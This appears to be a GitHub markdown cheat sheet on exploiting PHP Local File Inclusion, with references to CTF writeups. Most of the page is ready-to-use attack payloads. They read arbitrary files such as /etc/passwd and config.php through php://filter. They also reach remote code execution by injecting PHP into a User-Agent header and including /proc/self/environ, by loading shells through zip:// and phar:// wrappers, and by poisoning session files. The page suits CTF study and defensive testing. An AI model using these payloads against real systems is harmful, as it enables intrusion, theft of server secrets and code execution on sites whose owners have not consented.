-
Notifications
You must be signed in to change notification settings - Fork 43
/
Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md
66 lines (50 loc) · 2.23 KB
/
Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# Tricky ways to exploit PHP Local File Inclusion
## Introduction
Brought from [Wikipedia](https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion), Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution.
For instance:
```php
include $_GET['file'];
```
or harder one,
```php
include $_GET['file'] . ".php";
```
## Tricks
### Direct Local File Inclusion
- Reading arbitrary files:
* `index.php?file=/etc/passwd`
* `index.php?file=php://filter/convert.base64-encode/resource=config.php`
- Remote code exection:
* /proc/self/environ
```
GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
Host: www.site.com
User-Agent: <?php echo assert($_GET['cmd']);?>
```
* Zip and Phar wrappers
- `index.php?file=zip://image.zip#shell.php`
- `index.php?file=phar://image.phar/shell.php`
* Session Files
- PHP5 stores session files in `/var/lib/php5/sess_*`
```
Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
index.php?file=/var/lib/php5/sess_123php
```
### Indirect Local File Inclusion
- Reading arbitrary files:
* `index.php?file=php://filter/convert.base64-encode/resource=config # will append ".php" at the end`
- Remote code exection:
* Zip and Phar wrappers
- `index.php?file=zip://image.zip#shell`
- `index.php?file=phar://image.phar/shell`
* Session Files
- PHP5 stores session files in `/var/lib/php5/sess_*`
```
Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
index.php?file=/var/lib/php5/sess_123
```
## Reference
1. [File inclusion vulnerability](https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion)
2. [通过 zip/phar 协议包含文件](https://lightless.me/archives/include-file-from-zip-or-phar.html)
3. [AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)](http://blog.orange.tw/2015/09/ais3-final-ctf-web-writeup-race.html)
4. [lucyoa/ctf-wiki](https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion)